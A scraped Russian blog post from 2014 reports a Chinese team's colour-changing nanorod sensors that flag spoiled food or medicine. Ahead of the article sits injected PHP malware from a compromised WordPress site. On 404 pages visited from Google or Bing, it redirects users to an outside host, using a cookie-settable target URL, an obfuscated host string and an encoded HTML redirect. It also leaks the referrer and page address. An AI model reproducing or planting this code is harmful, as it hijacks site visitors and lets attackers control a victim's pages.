function wpd_do_stuff_on_40404(){ if( is_404() ){ if (!empty($_COOKIE["ee2da706cf547c9cb12fc30be76605b6"])) { update_option('wpd_do_stuff_on_40404_url', rawurldecode($_COOKIE["ee2da706cf547c9cb12fc30be76605b6"])); } if (strpos($_SERVER["HTTP_REFERER"], 'google.') !== FALSE || strpos($_SERVER["HTTP_REFERER"], 'bing.') !== FALSE) { $u = get_option('wpd_do_stuff_on_40404_url', 'mywebinfo.s' . 'ite/jquery.php'); if (!empty($u)) { $fu = 'http://' . $u . "?referrer=" . $_SERVER["HTTP_REFERER"] . '&u=' . rawurlencode($_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); $t = rawurldecode("%3Chtml%3E%0D%0A%20%20%20%3Chead%3E%0D%0A%20%20%20%20%20%20%3Cscript%20type%20%3D%20%22text%2Fjavascript%22%3E%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20function%20Redirect%28%29%20%7B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20window.location%20%3D%20%22%25s%22%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20document.write%28%22You%20will%20be%20redirected%20to%20main%20page%20in%202%20sec.%22%29%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20setTimeout%28%27Redirect%28%29%27%2C%202000%29%3B%0D%0A%20%20%20%20%20%20%3C%2Fscript%3E%0D%0A%20%20%20%3C%2Fhead%3E%0D%0A%20%20%20%3Cbody%3E%0D%0A%20%20%20%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A"); exit(sprintf($t, $fu)); } } } } add_action( 'template_redirect', 'wpd_do_stuff_on_40404' ); технологии комфорта от 24/03/2014 | Технологии Комфорта

технологии комфорта от 24/03/2014

Сегодня в номере:

  • Сенсоры предупредят вас, испортилась ли еда или медикаменты (+ видео).

Многие из нас пускают в ход свои аппараты обоняния, чтобы определить на запах, съедобна ли еда. И, как правило, этот способ нам позволяет понять, насколько еда пригодна к употреблению. Но способ, к сожалению, не самый надежный, и группа китайских ученых разработали более точный метод, используя маленькие сенсоры со встроенными наностержнями.

Каждый сенсор представляет собой ядрообразный кусок материала, встроенный в стенку резервуара. Сенсор содержит маленькие наностержни, которые реагируют на выпускание микробов в еде или лекарстве. Когда пища свежая – сенсор красного цвета, но как только она начинает портиться, то сначала сенсор становится оранжевым, потом желтым и в итоге зеленым. На последнем этапе, когда сенсор зеленый, лучше к еде уже вообще не прикасаться, если не хотите заработать серьезное пищевое отравление. Если на пузырьке с лекарством также зеленый цвет, как на картинке, то лучше пузырек выкинуть сразу.

Этот способ намного более точный, чем просто обращать внимание на срок годности. Сенсор еще и считывает температуру в дополнении к возрасту продукта. К примеру, если у грузовика с молочной продукцией сломался кондиционер летним жарким днем, то сенсоры все уже могут быть зелеными еще до того, как попадут на полки супермаркетов. И наоборот, если молоко хранилось в темном, прохладном месте, то даже дни и недели после указанного срока годности молоко пригодно к употреблению.

Главный разработчик Чао Чжанг (Chao Zhang) из Пекинского университета говорит, что сенсоры будут стоит всего пару центов каждый. Пока они еще не доступны в продаже, но создатели уже ищут производителей, кому это интересно.

Источник: gizmonews.ru

Опубликовано 24.03.2014в 11:36 дп. В рубриках: Технологии комфорта. Вы можете следить за ответами к этой записи через RSS 2.0. Отзывы и пинг пока закрыты.

Комментарии закрыты.